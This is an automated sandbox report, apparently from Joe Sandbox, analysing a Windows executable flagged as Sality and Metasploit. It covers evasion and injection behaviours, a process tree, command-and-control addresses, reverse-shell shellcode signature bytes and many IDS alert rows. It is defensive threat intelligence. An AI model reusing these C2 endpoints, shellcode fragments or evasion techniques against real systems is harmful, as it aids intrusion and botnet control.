Windows Analysis Report
PfBjDhHzvV.exe

Overview

General Information

Sample name: PfBjDhHzvV.exe (renamed because the original name is a hash value)
Original sample name: 31bbb64aa3c1753cd99c865869b58023.exe
Analysis ID: 1536844
MD5: 31bbb64aa3c1753cd99c865869b58023
SHA1: 339ecde6fcc4833268f84d0dd5bcb11606ea5e94
SHA256: 1a089c8808acf7d3a83c0524e07bd0bb888ab3c987d109bae0613e456c08f32f
Tags: 32, coinminer, exe, trojan

Detection

Detected families: Metasploit, Sality
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Metasploit Payload
Yara detected Sality
AI detected suspicious sample
Allocates memory in foreign processes
Changes security center settings (notifications, updates, antivirus, firewall)
Contains functionality to inject threads in other processes
Creates HTML files with .exe extension (expired dropper behavior)
Creates a thread in another existing process (thread injection)
Creates autorun.inf (USB autostart)
Deletes keys which are related to windows safe boot (disables safe mode boot)
Disables UAC (registry)
Disables user account control notifications
Found direct / indirect Syscall (likely to bypass EDR)
Hides threads from debuggers
Injects code into the Windows Explorer (explorer.exe)
Machine Learning detection for dropped file
Machine Learning detection for sample
May modify the system service descriptor table (often done to hook functions)
Modifies the windows firewall
Modifies the windows firewall notifications settings
PE file contains section with special chars
PE file has a writeable .text section
Query firmware table information (likely to detect VMs)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Writes to foreign memory regions
Abnormal high CPU Usage
Checks for available system drives (often done to infect USB drives)
Checks if the current process is being debugged
Connects to several IPs in different countries
Contains capabilities to detect virtual machines
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates files inside the system directory
Deletes files inside the Windows folder
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Entry point lies outside standard sections
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found decision node followed by non-executed suspicious APIs
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May infect USB drives
May sleep (evasive loops) to hinder dynamic analysis
Modifies existing windows services
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Communication To Uncommon Destination Ports
Sigma detected: Uncommon Svchost Parent Process
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • PfBjDhHzvV.exe (PID: 7272 cmdline: "C:\Users\user\Desktop\PfBjDhHzvV.exe" MD5: 31BBB64AA3C1753CD99C865869B58023)
    • fontdrvhost.exe (PID: 772 cmdline: "fontdrvhost.exe" MD5: BBCB897697B3442657C7D6E3EDDBD25F)
    • dllhost.exe (PID: 7384 cmdline: C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683} MD5: 08EB78E5BE019DF044C26B14703BD1FA)
    • fontdrvhost.exe (PID: 780 cmdline: "fontdrvhost.exe" MD5: BBCB897697B3442657C7D6E3EDDBD25F)
    • dwm.exe (PID: 976 cmdline: "dwm.exe" MD5: 5C27608411832C5B39BA04E33D53536C)
    • sihost.exe (PID: 3476 cmdline: sihost.exe MD5: A21E7719D73D0322E2E7D61802CB8F80)
    • svchost.exe (PID: 3524 cmdline: C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
    • svchost.exe (PID: 3556 cmdline: C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s WpnUserService MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
    • ctfmon.exe (PID: 3852 cmdline: "ctfmon.exe" MD5: B625C18E177D5BEB5A6F6432CCF46FB3)
    • explorer.exe (PID: 4056 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)
    • svchost.exe (PID: 1096 cmdline: C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
    • StartMenuExperienceHost.exe (PID: 4756 cmdline: "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca MD5: 5CDDF06A40E89358807A2B9506F064D9)
    • RuntimeBroker.exe (PID: 4844 cmdline: C:\Windows\System32\RuntimeBroker.exe -Embedding MD5: BA4CFE6461AFA1004C52F19C8F2169DC)
    • SearchApp.exe (PID: 4972 cmdline: "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca MD5: 5E1C9231F1F1DCBA168CA9F3227D9168)
    • ShellExperienceHost.exe (PID: 7984 cmdline: "C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe" -ServerName:App.AppXtk181tbxbce2qsex02s8tw7hfxa9xb3t.mca MD5: 9B8DE9D4EDF68EEF2C1E490ABC291567)
    • RuntimeBroker.exe (PID: 3596 cmdline: C:\Windows\System32\RuntimeBroker.exe -Embedding MD5: BA4CFE6461AFA1004C52F19C8F2169DC)
    • RuntimeBroker.exe (PID: 5620 cmdline: C:\Windows\System32\RuntimeBroker.exe -Embedding MD5: BA4CFE6461AFA1004C52F19C8F2169DC)
    • smartscreen.exe (PID: 5672 cmdline: C:\Windows\System32\smartscreen.exe -Embedding MD5: 02FB7069B8D8426DC72C9D8A495AF55A)
    • ApplicationFrameHost.exe (PID: 3496 cmdline: C:\Windows\system32\ApplicationFrameHost.exe -Embedding MD5: D58A8A987A8DAFAD9DC32A548CC061E7)
    • WinStore.App.exe (PID: 1868 cmdline: "C:\Program Files\WindowsApps\Microsoft.WindowsStore_11910.1002.5.0_x64__8wekyb3d8bbwe\WinStore.App.exe" -ServerName:App.AppXc75wvwned5vhz4xyxxecvgdjhdkgsdza.mca MD5: 6C44453CD661FC2DB18E4C09C4940399)
    • RuntimeBroker.exe (PID: 3536 cmdline: C:\Windows\System32\RuntimeBroker.exe -Embedding MD5: BA4CFE6461AFA1004C52F19C8F2169DC)
    • TextInputHost.exe (PID: 6852 cmdline: "C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe" -ServerName:InputApp.AppXjd5de1g66v206tj52m9d0dtpppx4cgpn.mca MD5: F050189D49E17D0D340DE52E9E5B711F)
    • conhost.exe (PID: 700 cmdline: C:\Windows\system32\conhost.exe 0x4 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • backgroundTaskHost.exe (PID: 6176 cmdline: "C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppX4325622ft6437f3xfywcfxgbedfvpn0x.mca MD5: DA7063B17DBB8BBB3015351016868006)
    • RuntimeBroker.exe (PID: 4908 cmdline: C:\Windows\System32\RuntimeBroker.exe -Embedding MD5: BA4CFE6461AFA1004C52F19C8F2169DC)
    • svchost.exe (PID: 4852 cmdline: C:\Windows\system32\svchost.exe -k UnistackSvcGroup MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
    • faawXJQQDELvfTymNiVz.exe (PID: 3888 cmdline: "C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
    • faawXJQQDELvfTymNiVz.exe (PID: 4432 cmdline: "C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
    • faawXJQQDELvfTymNiVz.exe (PID: 6644 cmdline: "C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
    • faawXJQQDELvfTymNiVz.exe (PID: 4548 cmdline: "C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
    • faawXJQQDELvfTymNiVz.exe (PID: 6748 cmdline: "C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
    • faawXJQQDELvfTymNiVz.exe (PID: 3364 cmdline: "C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
    • faawXJQQDELvfTymNiVz.exe (PID: 6152 cmdline: "C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
    • faawXJQQDELvfTymNiVz.exe (PID: 4256 cmdline: "C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
    • faawXJQQDELvfTymNiVz.exe (PID: 5744 cmdline: "C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
    • faawXJQQDELvfTymNiVz.exe (PID: 4692 cmdline: "C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
    • faawXJQQDELvfTymNiVz.exe (PID: 3032 cmdline: "C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
    • faawXJQQDELvfTymNiVz.exe (PID: 3300 cmdline: "C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
  • cleanup
Name: Sality
Description: F-Secure states that the Sality virus family has been circulating in the wild as early as 2003. Over the years, the malware has been developed and improved with the addition of new features, such as rootkit or backdoor functionality, and so on, keeping it an active and relevant threat despite the relative age of the malware. Modern Sality variants also have the ability to communicate over a peer-to-peer (P2P) network, allowing an attacker to control a botnet of Sality-infected machines. The combined resources of the Sality botnet may also be used by its controller(s) to perform other malicious actions, such as attacking routers.
Infection: Sality viruses typically infect executable files on local, shared and removable drives. In earlier variants, the Sality virus simply added its own malicious code to the end of the infected (or host) file, a technique known as prepending. The viral code that Sality inserts is polymorphic, a form of complex code that is intended to make analysis more difficult. Earlier Sality variants were regarded as technically sophisticated in that they use an Entry Point Obscuration (EPO) technique to hide their presence on the system. This technique means that the virus inserts a command somewhere in the middle of an infected file's code, so that when the system is reading the file to execute it and comes to the command, it forces the system to 'jump' to the malware's code and execute that instead. This technique was used to make discovery and disinfection of the malicious code harder.
Payload: Once installed on the computer system, Sality viruses usually also execute a malicious payload. The specific actions performed depend on the specific variant in question, but generally Sality viruses will attempt to terminate processes, particularly those related to security programs. The virus may also attempt to open connections to remote sites, download and run additional malicious files, and steal data from the infected machine.
Attribution: Salty Spider
Blogpost URLs: (none listed)
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.sality
{"Type": "Metasploit Connect", "IP": "189.25.42.209", "Port": 1338}
Source | Rule | Description | Author | Strings
00000000.00000003.1375059861.0000000004500000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_MetasploitPayload_3 | Yara detected Metasploit Payload | Joe Security |
00000000.00000003.1375059861.0000000004500000.00000004.00001000.00020000.00000000.sdmp | Windows_Trojan_Metasploit_4a1c4da8 | Identifies Metasploit 64 bit reverse tcp shellcode. | unknown | 0x6c97:$a: 6A 10 56 57 68 99 A5 74 61 FF D5 85 C0 74 0A FF 4E 08
00000000.00000002.2246784875.0000000004FD0000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_MetasploitPayload_3 | Yara detected Metasploit Payload | Joe Security |
00000000.00000002.2246784875.0000000004FD0000.00000040.00001000.00020000.00000000.sdmp | Windows_Trojan_Metasploit_4a1c4da8 | Identifies Metasploit 64 bit reverse tcp shellcode. | unknown | 0x1a0:$a: 6A 10 56 57 68 99 A5 74 61 FF D5 85 C0 74 0A FF 4E 08
00000000.00000002.2233936236.0000000000401000.00000020.00000001.01000000.00000003.sdmp | JoeSecurity_MetasploitPayload_3 | Yara detected Metasploit Payload | Joe Security |
(2 further entries not shown)
Source | Rule | Description | Author | Strings
0.2.PfBjDhHzvV.exe.1280cc4.6.raw.unpack | INDICATOR_EXE_Packed_SimplePolyEngine | Detects executables packed with Sality Polymorphic Code Generator or Simple Poly Engine or Sality | ditekSHen | 0x185c:$s1: Simple Poly Engine v
35.2.faawXJQQDELvfTymNiVz.exe.28a0cc4.5.raw.unpack | INDICATOR_EXE_Packed_SimplePolyEngine | Detects executables packed with Sality Polymorphic Code Generator or Simple Poly Engine or Sality | ditekSHen | 0x185c:$s1: Simple Poly Engine v
35.2.faawXJQQDELvfTymNiVz.exe.2880000.4.unpack | JoeSecurity_Sality | Yara detected Sality | Joe Security |
35.2.faawXJQQDELvfTymNiVz.exe.2880000.4.unpack | INDICATOR_EXE_Packed_SimplePolyEngine | Detects executables packed with Sality Polymorphic Code Generator or Simple Poly Engine or Sality | ditekSHen | 0x22520:$s1: Simple Poly Engine v
0.2.PfBjDhHzvV.exe.1260000.5.unpack | JoeSecurity_Sality | Yara detected Sality | Joe Security |
(3 further entries not shown)

            System Summary

Source: Network Connection, Author: Florian Roth (Nextron Systems), Data: DestinationIp: 190.120.227.91, DestinationIsIpv6: false, DestinationPort: 8080, EventID: 3, Image: C:\Users\user\Desktop\PfBjDhHzvV.exe, Initiated: true, ProcessId: 7272, Protocol: tcp, SourceIp: 192.168.2.7, SourceIsIpv6: false, SourcePort: 49737
Source: Process started, Author: Florian Roth (Nextron Systems), Data: Command: C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc, CommandLine: C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\PfBjDhHzvV.exe", ParentImage: C:\Users\user\Desktop\PfBjDhHzvV.exe, ParentProcessId: 7272, ParentProcessName: PfBjDhHzvV.exe, ProcessCommandLine: C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc, ProcessId: 3524, ProcessName: svchost.exe
Source: Registry Key set, Author: frack113, Data: Details: 0, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\PfBjDhHzvV.exe, ProcessId: 7272, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\GlobalUserOffline
Source: Process started, Author: vburov, Data: Command: C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc, CommandLine: C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\PfBjDhHzvV.exe", ParentImage: C:\Users\user\Desktop\PfBjDhHzvV.exe, ParentProcessId: 7272, ParentProcessName: PfBjDhHzvV.exe, ProcessCommandLine: C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc, ProcessId: 3524, ProcessName: svchost.exe
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-10-18T09:38:21.240690+0200 | 2012736 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49737 | 190.120.227.91 | 8080 | TCP
2024-10-18T09:38:26.713691+0200 | 2012736 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49764 | 190.120.227.91 | 8080 | TCP
2024-10-18T09:38:32.076146+0200 | 2012736 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49790 | 190.120.227.91 | 8080 | TCP
2024-10-18T09:38:37.482585+0200 | 2012736 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49824 | 190.120.227.91 | 8080 | TCP
2024-10-18T09:38:42.849777+0200 | 2012736 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49851 | 190.120.227.91 | 8080 | TCP
2024-10-18T09:38:48.414602+0200 | 2012736 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49888 | 190.120.227.91 | 8080 | TCP
2024-10-18T09:38:53.779104+0200 | 2012736 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49922 | 190.120.227.91 | 8080 | TCP
2024-10-18T09:38:59.200915+0200 | 2012736 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 62459 | 190.120.227.91 | 8080 | TCP
2024-10-18T09:39:04.530611+0200 | 2012736 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 62493 | 190.120.227.91 | 8080 | TCP
2024-10-18T09:39:10.778945+0200 | 2012736 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 62512 | 190.120.227.91 | 8080 | TCP
2024-10-18T09:39:16.194613+0200 | 2012736 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 62514 | 190.120.227.91 | 8080 | TCP
2024-10-18T09:39:21.577260+0200 | 2012736 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 62517 | 190.120.227.91 | 8080 | TCP
2024-10-18T09:39:26.962883+0200 | 2012736 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 62519 | 190.120.227.91 | 8080 | TCP
2024-10-18T09:39:32.388529+0200 | 2012736 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 62522 | 190.120.227.91 | 8080 | TCP
2024-10-18T09:39:37.753556+0200 | 2012736 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 62525 | 190.120.227.91 | 8080 | TCP
2024-10-18T09:39:42.049055+0200 | 2012736 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 62527 | 190.120.227.91 | 8080 | TCP
2024-10-18T09:39:53.953751+0200 | 2012736 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 62529 | 190.120.227.91 | 8080 | TCP
2024-10-18T09:40:03.871177+0200 | 2012736 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 62531 | 190.120.227.91 | 8080 | TCP
2024-10-18T09:40:13.679122+0200 | 2012736 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 62533 | 190.120.227.91 | 8080 | TCP
2024-10-18T09:40:23.537013+0200 | 2012736 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 62535 | 190.120.227.91 | 8080 | TCP
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-10-18T09:38:17.050151+0200 | 2018340 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49731 | 185.53.178.50 | 80 | TCP
2024-10-18T09:38:21.240690+0200 | 2018340 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49737 | 190.120.227.91 | 8080 | TCP
2024-10-18T09:38:22.591417+0200 | 2018340 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49758 | 185.53.178.50 | 80 | TCP
2024-10-18T09:38:26.713691+0200 | 2018340 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49764 | 190.120.227.91 | 8080 | TCP
2024-10-18T09:38:28.058130+0200 | 2018340 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49783 | 185.53.178.50 | 80 | TCP
2024-10-18T09:38:32.076146+0200 | 2018340 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49790 | 190.120.227.91 | 8080 | TCP
2024-10-18T09:38:33.454309+0200 | 2018340 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49813 | 185.53.178.50 | 80 | TCP
2024-10-18T09:38:37.482585+0200 | 2018340 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49824 | 190.120.227.91 | 8080 | TCP
2024-10-18T09:38:38.799893+0200 | 2018340 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49845 | 185.53.178.50 | 80 | TCP
2024-10-18T09:38:42.849777+0200 | 2018340 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49851 | 190.120.227.91 | 8080 | TCP
2024-10-18T09:38:44.218274+0200 | 2018340 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49881 | 185.53.178.50 | 80 | TCP
2024-10-18T09:38:48.414602+0200 | 2018340 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49888 | 190.120.227.91 | 8080 | TCP
2024-10-18T09:38:49.758906+0200 | 2018340 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49913 | 185.53.178.50 | 80 | TCP
2024-10-18T09:38:53.779104+0200 | 2018340 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49922 | 190.120.227.91 | 8080 | TCP
2024-10-18T09:38:55.191539+0200 | 2018340 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49943 | 185.53.178.50 | 80 | TCP
2024-10-18T09:38:59.200915+0200 | 2018340 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 62459 | 190.120.227.91 | 8080 | TCP
2024-10-18T09:39:00.500105+0200 | 2018340 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 62487 | 185.53.178.50 | 80 | TCP
2024-10-18T09:39:04.530611+0200 | 2018340 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 62493 | 190.120.227.91 | 8080 | TCP
2024-10-18T09:39:06.749431+0200 | 2018340 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 62510 | 185.53.178.50 | 80 | TCP
2024-10-18T09:39:10.778945+0200 | 2018340 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 62512 | 190.120.227.91 | 8080 | TCP
2024-10-18T09:39:12.134928+0200 | 2018340 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 62513 | 185.53.178.50 | 80 | TCP
2024-10-18T09:39:16.194613+0200 | 2018340 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 62514 | 190.120.227.91 | 8080 | TCP
2024-10-18T09:39:17.525520+0200 | 2018340 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 62516 | 185.53.178.50 | 80 | TCP
2024-10-18T09:39:21.577260+0200 | 2018340 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 62517 | 190.120.227.91 | 8080 | TCP
2024-10-18T09:39:22.899604+0200 | 2018340 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 62518 | 185.53.178.50 | 80 | TCP
2024-10-18T09:39:26.962883+0200 | 2018340 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 62519 | 190.120.227.91 | 8080 | TCP
2024-10-18T09:39:28.305192+0200 | 2018340 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 62521 | 185.53.178.50 | 80 | TCP
2024-10-18T09:39:32.388529+0200 | 2018340 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 62522 | 190.120.227.91 | 8080 | TCP
2024-10-18T09:39:33.728702+0200 | 2018340 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 62524 | 185.53.178.50 | 80 | TCP
2024-10-18T09:39:37.753556+0200 | 2018340 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 62525 | 190.120.227.91 | 8080 | TCP
2024-10-18T09:39:39.248321+0200 | 2018340 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 62526 | 185.53.178.50 | 80 | TCP
2024-10-18T09:39:42.049055+0200 | 2018340 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 62527 | 190.120.227.91 | 8080 | TCP
2024-10-18T09:39:45.318935+0200 | 2018340 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 62528 | 185.53.178.50 | 80 | TCP
2024-10-18T09:39:53.953751+0200 | 2018340 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 62529 | 190.120.227.91 | 8080 | TCP
2024-10-18T09:39:55.330024+0200 | 2018340 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 62530 | 185.53.178.50 | 80 | TCP
2024-10-18T09:40:03.871177+0200 | 2018340 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 62531 | 190.120.227.91 | 8080 | TCP
2024-10-18T09:40:05.184315+0200 | 2018340 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 62532 | 185.53.178.50 | 80 | TCP
2024-10-18T09:40:13.679122+0200 | 2018340 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 62533 | 190.120.227.91 | 8080 | TCP
2024-10-18T09:40:15.014967+0200 | 2018340 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 62534 | 185.53.178.50 | 80 | TCP
2024-10-18T09:40:23.537013+0200 | 2018340 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 62535 | 190.120.227.91 | 8080 | TCP
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-10-18T09:38:17.050151+0200 | 2803270 | 2 | Potentially Bad Traffic | 192.168.2.7 | 49731 | 185.53.178.50 | 80 | TCP
2024-10-18T09:38:21.240690+0200 | 2803270 | 2 | Potentially Bad Traffic | 192.168.2.7 | 49737 | 190.120.227.91 | 8080 | TCP
2024-10-18T09:38:22.591417+0200 | 2803270 | 2 | Potentially Bad Traffic | 192.168.2.7 | 49758 | 185.53.178.50 | 80 | TCP
2024-10-18T09:38:26.713691+0200 | 2803270 | 2 | Potentially Bad Traffic | 192.168.2.7 | 49764 | 190.120.227.91 | 8080 | TCP
2024-10-18T09:38:28.058130+0200 | 2803270 | 2 | Potentially Bad Traffic | 192.168.2.7 | 49783 | 185.53.178.50 | 80 | TCP
2024-10-18T09:38:32.076146+0200 | 2803270 | 2 | Potentially Bad Traffic | 192.168.2.7 | 49790 | 190.120.227.91 | 8080 | TCP
2024-10-18T09:38:33.454309+0200 | 2803270 | 2 | Potentially Bad Traffic | 192.168.2.7 | 49813 | 185.53.178.50 | 80 | TCP
2024-10-18T09:38:37.482585+0200 | 2803270 | 2 | Potentially Bad Traffic | 192.168.2.7 | 49824 | 190.120.227.91 | 8080 | TCP
2024-10-18T09:38:38.799893+0200 | 2803270 | 2 | Potentially Bad Traffic | 192.168.2.7 | 49845 | 185.53.178.50 | 80 | TCP
2024-10-18T09:38:42.849777+0200 | 2803270 | 2 | Potentially Bad Traffic | 192.168.2.7 | 49851 | 190.120.227.91 | 8080 | TCP
2024-10-18T09:38:44.218274+0200 | 2803270 | 2 | Potentially Bad Traffic | 192.168.2.7 | 49881 | 185.53.178.50 | 80 | TCP
2024-10-18T09:38:48.414602+0200 | 2803270 | 2 | Potentially Bad Traffic | 192.168.2.7 | 49888 | 190.120.227.91 | 8080 | TCP
2024-10-18T09:38:49.758906+0200 | 2803270 | 2 | Potentially Bad Traffic | 192.168.2.7 | 49913 | 185.53.178.50 | 80 | TCP
2024-10-18T09:38:53.779104+0200 | 2803270 | 2 | Potentially Bad Traffic | 192.168.2.7 | 49922 | 190.120.227.91 | 8080 | TCP
2024-10-18T09:38:55.191539+0200 | 2803270 | 2 | Potentially Bad Traffic | 192.168.2.7 | 49943 | 185.53.178.50 | 80 | TCP
2024-10-18T09:38:59.200915+0200 | 2803270 | 2 | Potentially Bad Traffic | 192.168.2.7 | 62459 | 190.120.227.91 | 8080 | TCP
2024-10-18T09:39:00.500105+0200 | 2803270 | 2 | Potentially Bad Traffic | 192.168.2.7 | 62487 | 185.53.178.50 | 80 | TCP
2024-10-18T09:39:04.530611+0200 | 2803270 | 2 | Potentially Bad Traffic | 192.168.2.7 | 62493 | 190.120.227.91 | 8080 | TCP
2024-10-18T09:39:06.749431+0200 | 2803270 | 2 | Potentially Bad Traffic | 192.168.2.7 | 62510 | 185.53.178.50 | 80 | TCP
2024-10-18T09:39:10.778945+0200 | 2803270 | 2 | Potentially Bad Traffic | 192.168.2.7 | 62512 | 190.120.227.91 | 8080 | TCP
2024-10-18T09:39:12.134928+0200 | 2803270 | 2 | Potentially Bad Traffic | 192.168.2.7 | 62513 | 185.53.178.50 | 80 | TCP
